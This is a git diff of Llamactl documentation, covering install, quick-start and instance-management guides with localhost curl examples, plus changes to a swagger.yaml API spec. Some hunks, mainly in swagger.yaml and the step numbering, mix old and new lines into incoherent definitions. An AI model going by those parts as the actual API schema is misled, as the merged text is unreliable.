    "gpu_memory_utilization": 0.9
  }
 }
 ```
 ## Using the API
 You can also manage instances via the REST API:
 ```bash
 # List all instances
 curl http://localhost:8080/api/instances
 # Create a new llama.cpp instance
 curl -X POST http://localhost:8080/api/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    }
  }'
 # Start an instance
 curl -X POST http://localhost:8080/api/instances/my-model/start
 ```
 ## OpenAI Compatible API
 Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
 ### Chat Completions
 Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
 ```bash
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-model",
    "messages": [
      {
        "role": "user",
        "content": "Hello! Can you help me write a Python function?"
      }
    ],
    "max_tokens": 150,
    "temperature": 0.7
  }'
 ```
 ### Using with Python OpenAI Client
 You can also use the official OpenAI Python client:
 ```python
 from openai import OpenAI
 # Point the client to your Llamactl server
 client = OpenAI(
    base_url="http://localhost:8080/v1",
    api_key="not-needed"  # Llamactl doesn't require API keys by default
 )
 # Create a chat completion
 response = client.chat.completions.create(
    model="my-model",  # Use the name of your instance
    messages=[
        {"role": "user", "content": "Explain quantum computing in simple terms"}
    ],
    max_tokens=200,
    temperature=0.7
 )
 print(response.choices[0].message.content)
 ```
 ### List Available Models
 Get a list of running instances (models) in OpenAI-compatible format:
 ```bash
 curl http://localhost:8080/v1/models
 ```
 ## Next Steps
 - Manage instances [Managing Instances](../user-guide/managing-instances.md)
 - Explore the [API Reference](../user-guide/api-reference.md)
 - Configure advanced settings in the [Configuration](configuration.md) guide
--- a/docs/images/create_instance.png
+++ b/docs/images/create_instance.png
--- a/docs/images/dashboard.png
+++ b/docs/images/dashboard.png
--- a/docs/index.md
+++ b/docs/index.md
@@ -14,20 +14,20 @@ Welcome to the Llamactl documentation!
 ## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
+- [Installation Guide](installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
+- [Configuration Guide](configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
+- [Quick Start](quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
+- [Managing Instances](managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
+- [API Reference](api-reference.md) - Complete API documentation
 ## Getting Help
 If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
+- Check the [Troubleshooting](troubleshooting.md) guide
 - Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
+- Review the [Configuration Guide](configuration.md) for advanced settings
 ## License
--- a/docs/installation.md
+++ b/docs/installation.md
@@ -0,0 +1,174 @@
 # Installation
 This guide will walk you through installing Llamactl on your system.
 ## Prerequisites
 ### Backend Dependencies
 llamactl supports multiple backends. Install at least one:
 **For llama.cpp backend (all platforms):**
 You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
 ```bash
 # Homebrew (macOS/Linux)
 brew install llama.cpp
 # Winget (Windows)
 winget install llama.cpp
 ```
 Or build from source - see llama.cpp docs
 **For MLX backend (macOS only):**
 MLX provides optimized inference on Apple Silicon. Install MLX-LM:
 ```bash
 # Install via pip (requires Python 3.8+)
 pip install mlx-lm
 # Or in a virtual environment (recommended)
 python -m venv mlx-env
 source mlx-env/bin/activate
 pip install mlx-lm
 ```
 Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
 **For vLLM backend:**
 vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
 ```bash
 # Install in a virtual environment
 python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
 ```
 ## Installation Methods
 ### Option 1: Download Binary (Recommended)
 Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Docker
 llamactl provides Dockerfiles for creating Docker images with backends pre-installed. The resulting images include the latest llamactl release with the respective backend.
 **Available Dockerfiles (CUDA):**
 - **llamactl with llama.cpp CUDA**: `docker/Dockerfile.llamacpp` (based on `ghcr.io/ggml-org/llama.cpp:server-cuda`)
 - **llamactl with vLLM CUDA**: `docker/Dockerfile.vllm` (based on `vllm/vllm-openai:latest`)
 - **llamactl built from source**: `docker/Dockerfile.source` (multi-stage build with webui)
 **Note:** These Dockerfiles are configured for CUDA. For other platforms (CPU, ROCm, Vulkan, etc.), adapt the base image. For llama.cpp, see available tags at [llama.cpp Docker docs](https://github.com/ggml-org/llama.cpp/blob/master/docs/docker.md). For vLLM, check [vLLM docs](https://docs.vllm.ai/en/v0.6.5/serving/deploying_with_docker.html).
 **Using Docker Compose**
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Create directories for data and models
 mkdir -p data/llamacpp data/vllm models
 # Start llamactl with llama.cpp backend
 docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
 # Or start llamactl with vLLM backend
 docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
 ```
 Access the dashboard at:
 - llamactl with llama.cpp: http://localhost:8080
 - llamactl with vLLM: http://localhost:8081
 **Using Docker Build and Run**
 1. llamactl with llama.cpp CUDA:
 ```bash
 docker build -f docker/Dockerfile.llamacpp -t llamactl:llamacpp-cuda .
 docker run -d \
  --name llamactl-llamacpp \
  --gpus all \
  -p 8080:8080 \
  -v ~/.cache/llama.cpp:/root/.cache/llama.cpp \
  llamactl:llamacpp-cuda
 ```
 2. llamactl with vLLM CUDA:
 ```bash
 docker build -f docker/Dockerfile.vllm -t llamactl:vllm-cuda .
 docker run -d \
  --name llamactl-vllm \
  --gpus all \
  -p 8080:8080 \
  -v ~/.cache/huggingface:/root/.cache/huggingface \
  llamactl:vllm-cuda
 ```
 3. llamactl built from source:
 ```bash
 docker build -f docker/Dockerfile.source -t llamactl:source .
 docker run -d \
  --name llamactl \
  -p 8080:8080 \
  llamactl:source
 ```
 ### Option 3: Build from Source
 Requirements:
 - Go 1.24 or later
 - Node.js 22 or later
 - Git
 If you prefer to build from source:
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Build the web UI
 cd webui && npm ci && npm run build && cd ..
 # Build the application
 go build -o llamactl ./cmd/server
 ```
 ## Remote Node Installation
 For deployments with remote nodes:
 - Install llamactl on each node using any of the methods above
 - Configure API keys for authentication between nodes
 - Ensure node names are consistent across all configurations
 ## Verification
 Verify your installation by checking the version:
 ```bash
 llamactl --version
 ```
 ## Next Steps
 Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
 For remote node deployments, see the [Configuration Guide](configuration.md) for node setup instructions.
--- a/docs/user-guide/managing-instances.md
+++ b/docs/user-guide/managing-instances.md
@@ -9,13 +9,17 @@ Llamactl provides two ways to manage instances:
 - **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
 - **REST API**: Programmatic access for automation and integration
-![Dashboard Screenshot](../images/dashboard.png)
+![Dashboard Screenshot](images/dashboard.png)
 ### Authentication
-If authentication is enabled:
+Llamactl uses a **Management API Key** to authenticate requests to the management API (creating, starting, stopping instances). All curl examples below use `<token>` as a placeholder - replace this with your actual Management API Key.
 By default, authentication is required. If you don't configure a management API key in your configuration file, llamactl will auto-generate one and print it to the terminal on startup. See the [Configuration](configuration.md) guide for details.
 For Web UI access:
 1. Navigate to the web UI
-2. Enter your credentials
+2. Enter your Management API Key
 3. Bearer token is stored for the session
 ### Theme Support
@@ -33,38 +37,45 @@ Each instance is displayed as a card showing:
 ## Create Instance
-### Via Web UI
+**Via Web UI**
-![Create Instance Screenshot](../images/create_instance.png)
+![Create Instance Screenshot](images/create_instance.png)
 1. Click the **"Create Instance"** button on the dashboard
 2. Enter a unique **Name** for your instance (only required field)
-3. **Choose Backend Type**:
+3. **Select Target Node**: Choose which node to deploy the instance to from the dropdown
 4. **Choose Backend Type**:
    - **llama.cpp**: For GGUF models using llama-server
    - **MLX**: For MLX-optimized models (macOS only)
    - **vLLM**: For distributed serving and high-throughput inference
-4. Configure model source:
+5. Configure model source:
    - **For llama.cpp**: GGUF model path or HuggingFace repo
    - **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
    - **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
-5. Configure optional instance management settings:
+6. Configure optional instance management settings:
    - **Auto Restart**: Automatically restart instance on failure
    - **Max Restarts**: Maximum number of restart attempts
    - **Restart Delay**: Delay in seconds between restart attempts
    - **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
    - **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
-6. Configure backend-specific options:
+    - **Environment Variables**: Set custom environment variables for the instance process
 7. Configure backend-specific options:
    - **llama.cpp**: Threads, context size, GPU layers, port, etc.
    - **MLX**: Temperature, top-p, adapter path, Python environment, etc.
    - **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
 7. Click **"Create"** to save the instance  
-### Via API
+!!! tip "Auto-Assignment"
    Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
 8. Click **"Create"** to save the instance  
 **Via API**
 ```bash
 # Create llama.cpp instance with local model file
-curl -X POST http://localhost:8080/api/instances/my-llama-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-llama-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
@@ -72,12 +83,14 @@ curl -X POST http://localhost:8080/api/instances/my-llama-instance \
      "threads": 8,
      "ctx_size": 4096,
      "gpu_layers": 32
-    }
+    },
    "nodes": ["main"]
  }'
 # Create MLX instance (macOS only)
-curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-mlx-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "mlx_lm",
    "backend_options": {
@@ -87,12 +100,14 @@ curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
      "max_tokens": 2048
    },
    "auto_restart": true,
-    "max_restarts": 3
+    "max_restarts": 3,
    "nodes": ["main"]
  }'
 # Create vLLM instance
-curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-vllm-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "vllm",
    "backend_options": {
@@ -101,60 +116,97 @@ curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
      "gpu_memory_utilization": 0.9
    },
    "auto_restart": true,
-    "on_demand_start": true
+    "on_demand_start": true,
    "environment": {
      "CUDA_VISIBLE_DEVICES": "0,1",
      "NCCL_DEBUG": "INFO",
      "PYTHONPATH": "/custom/path"
    },
    "nodes": ["main"]
  }'
 # Create llama.cpp instance with HuggingFace model
-curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
+curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "hf_repo": "unsloth/gemma-3-27b-it-GGUF",
      "hf_file": "gemma-3-27b-it-GGUF.gguf",
      "gpu_layers": 32
-    }
+    },
    "nodes": ["main"]
  }'
 # Create instance on specific remote node
 curl -X POST http://localhost:8080/api/v1/instances/remote-llama \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-7b.gguf",
      "gpu_layers": 32
    },
    "nodes": ["worker1"]
  }'
 # Create instance on multiple nodes for high availability
 curl -X POST http://localhost:8080/api/v1/instances/multi-node-llama \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-7b.gguf",
      "gpu_layers": 32
    },
    "nodes": ["worker1", "worker2", "worker3"]
  }'
 ```
 ## Start Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Start"** button on an instance card
 2. Watch the status change to "Unknown"
 3. Monitor progress in the logs
 4. Instance status changes to "Ready" when ready
-### Via API
+**Via API**
 ```bash
-curl -X POST http://localhost:8080/api/instances/{name}/start
+curl -X POST http://localhost:8080/api/v1/instances/{name}/start \
  -H "Authorization: Bearer <token>"
 ```
 ## Stop Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Stop"** button on an instance card
 2. Instance gracefully shuts down
-### Via API
+**Via API**
 ```bash
-curl -X POST http://localhost:8080/api/instances/{name}/stop
+curl -X POST http://localhost:8080/api/v1/instances/{name}/stop \
  -H "Authorization: Bearer <token>"
 ```
 ## Edit Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Edit"** button on an instance card
 2. Modify settings in the configuration dialog
 3. Changes require instance restart to take effect
 4. Click **"Update & Restart"** to apply changes
-### Via API
+**Via API**
 Modify instance settings:
 ```bash
-curl -X PUT http://localhost:8080/api/instances/{name} \
+curl -X PUT http://localhost:8080/api/v1/instances/{name} \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_options": {
      "threads": 8,
@@ -169,29 +221,31 @@ curl -X PUT http://localhost:8080/api/instances/{name} \
 ## View Logs
-### Via Web UI
+**Via Web UI**
 1. Click the **"Logs"** button on any instance card
 2. Real-time log viewer opens
-### Via API
+**Via API**
 Check instance status in real-time:
 ```bash
-# Get instance details
+# Get instance logs
-curl http://localhost:8080/api/instances/{name}/logs
+curl http://localhost:8080/api/v1/instances/{name}/logs \
  -H "Authorization: Bearer <token>"
 ```
 ## Delete Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Delete"** button on an instance card
 2. Only stopped instances can be deleted
 3. Confirm deletion in the dialog
-### Via API
+**Via API**
 ```bash
-curl -X DELETE http://localhost:8080/api/instances/{name}
+curl -X DELETE http://localhost:8080/api/v1/instances/{name} \
  -H "Authorization: Bearer <token>"
 ```
 ## Instance Proxy
@@ -199,8 +253,9 @@ curl -X DELETE http://localhost:8080/api/instances/{name}
 Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
 ```bash
-# Get instance details
+# Proxy requests to the instance
-curl http://localhost:8080/api/instances/{name}/proxy/
+curl http://localhost:8080/api/v1/instances/{name}/proxy/ \
  -H "Authorization: Bearer <token>"
 ```
 All backends provide OpenAI-compatible endpoints. Check the respective documentation:
@@ -210,14 +265,16 @@ All backends provide OpenAI-compatible endpoints. Check the respective documenta
 ### Instance Health
-#### Via Web UI
+**Via Web UI**
 1. The health status badge is displayed on each instance card
-#### Via API
+**Via API**
 Check the health status of your instances:
 ```bash
-curl http://localhost:8080/api/instances/{name}/proxy/health
+curl http://localhost:8080/api/v1/instances/{name}/proxy/health \
  -H "Authorization: Bearer <token>"
 ```
--- a/docs/quick-start.md
+++ b/docs/quick-start.md
@@ -0,0 +1,263 @@
 # Quick Start
 This guide will help you get Llamactl up and running in just a few minutes.
 **Before you begin:** Ensure you have at least one backend installed (llama.cpp, MLX, or vLLM). See the [Installation Guide](installation.md#prerequisites) for backend setup.
 ## Core Concepts
 Before you start, let's clarify a few key terms:
 - **Instance**: A running backend server that serves a specific model. Each instance has a unique name and runs independently.
 - **Backend**: The inference engine that actually runs the model (llama.cpp, MLX, or vLLM). You need at least one backend installed before creating instances.
 - **Node**: In multi-machine setups, a node represents one machine. Most users will just use the default "main" node for single-machine deployments.
 - **Proxy Architecture**: Llamactl acts as a proxy in front of your instances. You make requests to llamactl (e.g., `http://localhost:8080/v1/chat/completions`), and it routes them to the appropriate backend instance. This means you don't need to track individual instance ports or endpoints.
 ## Authentication
 Llamactl uses two types of API keys:
 - **Management API Key**: Used to authenticate with the Llamactl management API (creating, starting, stopping instances).
 - **Inference API Key**: Used to authenticate requests to the OpenAI-compatible endpoints (`/v1/chat/completions`, `/v1/completions`, etc.).
 By default, authentication is required. If you don't configure these keys in your configuration file, llamactl will auto-generate them and print them to the terminal on startup. You can also configure custom keys or disable authentication entirely in the [Configuration](configuration.md) guide.
 ## Start Llamactl
 Start the Llamactl server:
 ```bash
 llamactl
 ```
 ```
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  MANAGEMENT AUTHENTICATION REQUIRED
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 🔑  Generated Management API Key:
    sk-management-...
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  INFERENCE AUTHENTICATION REQUIRED
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 🔑  Generated Inference API Key:
    sk-inference-...
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  IMPORTANT
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 • These keys are auto-generated and will change on restart
 • For production, add explicit keys to your configuration
 • Copy these keys before they disappear from the terminal
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 Llamactl server listening on 0.0.0.0:8080
 ```
 Copy the **Management** and **Inference** API Keys from the terminal - you'll need them to access the web UI and make inference requests.
 By default, Llamactl will start on `http://localhost:8080`.
 ## Access the Web UI
 Open your web browser and navigate to:
 ```
 http://localhost:8080
 ```
 Login with the management API key from the terminal output.
 You should see the Llamactl web interface.
 ## Create Your First Instance
 1. Click the "Add Instance" button
 2. Fill in the instance configuration:
     - **Name**: Give your instance a descriptive name
     - **Node**: Select which node to deploy the instance to (defaults to "main" for single-node setups)
     - **Backend Type**: Choose from llama.cpp, MLX, or vLLM
     - **Model**: Model path or huggingface repo
     - **Additional Options**: Backend-specific parameters
    !!! tip "Auto-Assignment"
        Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
    !!! note "Remote Node Deployment"
        If you have configured remote nodes in your configuration file, you can select which node to deploy the instance to. This allows you to distribute instances across multiple machines. See the [Configuration](configuration.md#remote-node-configuration) guide for details on setting up remote nodes.
 3. Click "Create Instance"
 ## Start Your Instance
 Once created, you can:
 - **Start** the instance by clicking the start button
 - **Monitor** its status in real-time
 - **View logs** by clicking the logs button
 - **Stop** the instance when needed
 ## Example Configurations
 Here are basic example configurations for each backend:
 **llama.cpp backend:**
 ```json
 {
  "name": "llama2-7b",
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/llama-2-7b-chat.gguf",
    "threads": 4,
    "ctx_size": 2048,
    "gpu_layers": 32
  },
  "nodes": ["main"]
 }
 ```
 **MLX backend (macOS only):**
 ```json
 {
  "name": "mistral-mlx",
  "backend_type": "mlx_lm",
  "backend_options": {
    "model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
    "temp": 0.7,
    "max_tokens": 2048
  },
  "nodes": ["main"]
 }
 ```
 **vLLM backend:**
 ```json
 {
  "name": "dialogpt-vllm",
  "backend_type": "vllm",
  "backend_options": {
    "model": "microsoft/DialoGPT-medium",
    "tensor_parallel_size": 2,
    "gpu_memory_utilization": 0.9
  },
  "nodes": ["main"]
 }
 ```
 **Remote node deployment example:**
 ```json
 {
  "name": "distributed-model",
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/model.gguf",
    "gpu_layers": 32
  },
  "nodes": ["worker1"]
 }
 ```
 ## Docker Support
 Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
 ```yaml
 backends:
  vllm:
    command: "vllm"
    args: ["serve"]
    docker:
      enabled: true
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
 ```
 ## Using the API
 You can also manage instances via the REST API:
 ```bash
 # List all instances
 curl http://localhost:8080/api/v1/instances
 # Create a new llama.cpp instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    }
  }'
 # Start an instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model/start
 ```
 ## OpenAI Compatible API
 Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
 ### Chat Completions
 Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
 ```bash
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-model",
    "messages": [
      {
        "role": "user",
        "content": "Hello! Can you help me write a Python function?"
      }
    ],
    "max_tokens": 150,
    "temperature": 0.7
  }'
 ```
 ### Using with Python OpenAI Client
 You can also use the official OpenAI Python client:
 ```python
 from openai import OpenAI
 # Point the client to your Llamactl server
 client = OpenAI(
    base_url="http://localhost:8080/v1",
    api_key="your-inference-api-key"  # Use the inference API key from terminal or config
 )
 # Create a chat completion
 response = client.chat.completions.create(
    model="my-model",  # Use the name of your instance
    messages=[
        {"role": "user", "content": "Explain quantum computing in simple terms"}
    ],
    max_tokens=200,
    temperature=0.7
 )
 print(response.choices[0].message.content)
 ```
 !!! note "API Key"
    If you disabled authentication in your config, you can use any value for `api_key` (e.g., `"not-needed"`). Otherwise, use the inference API key shown in the terminal output on startup.
 ### List Available Models
 Get a list of running instances (models) in OpenAI-compatible format:
 ```bash
 curl http://localhost:8080/v1/models
 ```
 ## Next Steps
 - Manage instances [Managing Instances](managing-instances.md)
 - Explore the [API Reference](api-reference.md)
 - Configure advanced settings in the [Configuration](configuration.md) guide
--- a/apidocs/swagger.json
+++ b/apidocs/swagger.json
--- a/apidocs/swagger.yaml
+++ b/apidocs/swagger.yaml
@@ -1,25 +1,23 @@
 basePath: /api/v1
 definitions:
-  backends.BackendType:
+  instance.Instance:
-    enum:
+    properties:
-    - llama_cpp
+      created:
-    - mlx_lm
+        description: Unix timestamp when the instance was created
-    - vllm
+        type: integer
-    type: string
+      name:
-    x-enum-varnames:
+        type: string
-    - BackendTypeLlamaCpp
+    type: object
-    - BackendTypeMlxLm
+  instance.Options:
    - BackendTypeVllm
  instance.CreateInstanceOptions:
    properties:
      auto_restart:
        description: Auto restart
        type: boolean
-      backend_options:
+      environment:
-        additionalProperties: {}
+        additionalProperties:
          type: string
        description: Environment variables
        type: object
      backend_type:
        $ref: '#/definitions/backends.BackendType'
      idle_timeout:
        description: Idle timeout
        type: integer
@@ -32,27 +30,10 @@ definitions:
        description: seconds
        type: integer
    type: object
-  instance.InstanceStatus:
+  server.NodeResponse:
    enum:
    - 0
    - 1
    - 2
    type: integer
    x-enum-varnames:
    - Stopped
    - Running
    - Failed
  instance.Process:
    properties:
-      created:
+      address:
        description: Creation time
        type: integer
      name:
        type: string
      status:
        allOf:
        - $ref: '#/definitions/instance.InstanceStatus'
        description: Status
    type: object
  server.OpenAIInstance:
    properties:
@@ -88,7 +69,7 @@ info:
  title: llamactl API
  version: "1.0"
 paths:
-  /backends/llama-cpp/devices:
+  /api/v1/backends/llama-cpp/devices:
    get:
      description: Returns a list of available devices for the llama server
      responses:
@@ -104,8 +85,8 @@ paths:
      - ApiKeyAuth: []
      summary: List available devices for llama server
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/help:
+  /api/v1/backends/llama-cpp/help:
    get:
      description: Returns the help text for the llama server command
      responses:
@@ -121,8 +102,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get help for llama server
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/parse-command:
+  /api/v1/backends/llama-cpp/parse-command:
    post:
      consumes:
      - application/json
@@ -140,7 +121,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -157,8 +138,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse llama-server command
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/version:
+  /api/v1/backends/llama-cpp/version:
    get:
      description: Returns the version of the llama server command
      responses:
@@ -174,8 +155,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get version of llama server
      tags:
-      - backends
+      - Backends
-  /backends/mlx/parse-command:
+  /api/v1/backends/mlx/parse-command:
    post:
      consumes:
      - application/json
@@ -193,7 +174,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -204,8 +185,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse mlx_lm.server command
      tags:
-      - backends
+      - Backends
-  /backends/vllm/parse-command:
+  /api/v1/backends/vllm/parse-command:
    post:
      consumes:
      - application/json
@@ -223,7 +204,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -234,8 +215,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse vllm serve command
      tags:
-      - backends
+      - Backends
-  /instances:
+  /api/v1/instances:
    get:
      description: Returns a list of all instances managed by the server
      responses:
@@ -243,7 +224,7 @@ paths:
          description: List of instances
          schema:
            items:
-              $ref: '#/definitions/instance.Process'
+              $ref: '#/definitions/instance.Instance'
            type: array
        "500":
          description: Internal Server Error
@@ -253,8 +234,8 @@ paths:
      - ApiKeyAuth: []
      summary: List all instances
      tags:
-      - instances
+      - Instances
-  /instances/{name}:
+  /api/v1/instances/{name}:
    delete:
      description: Stops and removes a specific instance by name
      parameters:
@@ -278,7 +259,7 @@ paths:
      - ApiKeyAuth: []
      summary: Delete an instance
      tags:
-      - instances
+      - Instances
    get:
      description: Returns the details of a specific instance by name
      parameters:
@@ -291,7 +272,7 @@ paths:
        "200":
          description: Instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -304,7 +285,7 @@ paths:
      - ApiKeyAuth: []
      summary: Get details of a specific instance
      tags:
-      - instances
+      - Instances
    post:
      consumes:
      - application/json
@@ -320,12 +301,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/instance.CreateInstanceOptions'
+          $ref: '#/definitions/instance.Options'
      responses:
        "201":
          description: Created instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid request body
          schema:
@@ -338,7 +319,7 @@ paths:
      - ApiKeyAuth: []
      summary: Create and start a new instance
      tags:
-      - instances
+      - Instances
    put:
      consumes:
      - application/json
@@ -354,12 +335,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/instance.CreateInstanceOptions'
+          $ref: '#/definitions/instance.Options'
      responses:
        "200":
          description: Updated instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -372,8 +353,8 @@ paths:
      - ApiKeyAuth: []
      summary: Update an instance's configuration
      tags:
-      - instances
+      - Instances
-  /instances/{name}/logs:
+  /api/v1/instances/{name}/logs:
    get:
      description: Returns the logs from a specific instance by name with optional
        line limit
@@ -404,8 +385,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get logs from a specific instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/proxy:
+  /api/v1/instances/{name}/proxy:
    get:
      description: Forwards HTTP requests to the llama-server instance running on
        a specific port
@@ -432,9 +413,10 @@ paths:
            type: string
      security:
      - ApiKeyAuth: []
-      summary: Proxy requests to a specific instance
+      summary: Proxy requests to a specific instance, does not autostart instance
        if stopped
      tags:
-      - instances
+      - Instances
    post:
      description: Forwards HTTP requests to the llama-server instance running on
        a specific port
@@ -461,10 +443,11 @@ paths:
            type: string
      security:
      - ApiKeyAuth: []
-      summary: Proxy requests to a specific instance
+      summary: Proxy requests to a specific instance, does not autostart instance
        if stopped
      tags:
-      - instances
+      - Instances
-  /instances/{name}/restart:
+  /api/v1/instances/{name}/restart:
    post:
      description: Restarts a specific instance by name
      parameters:
@@ -477,7 +460,7 @@ paths:
        "200":
          description: Restarted instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -490,8 +473,8 @@ paths:
      - ApiKeyAuth: []
      summary: Restart a running instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/start:
+  /api/v1/instances/{name}/start:
    post:
      description: Starts a specific instance by name
      parameters:
@@ -504,7 +487,7 @@ paths:
        "200":
          description: Started instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
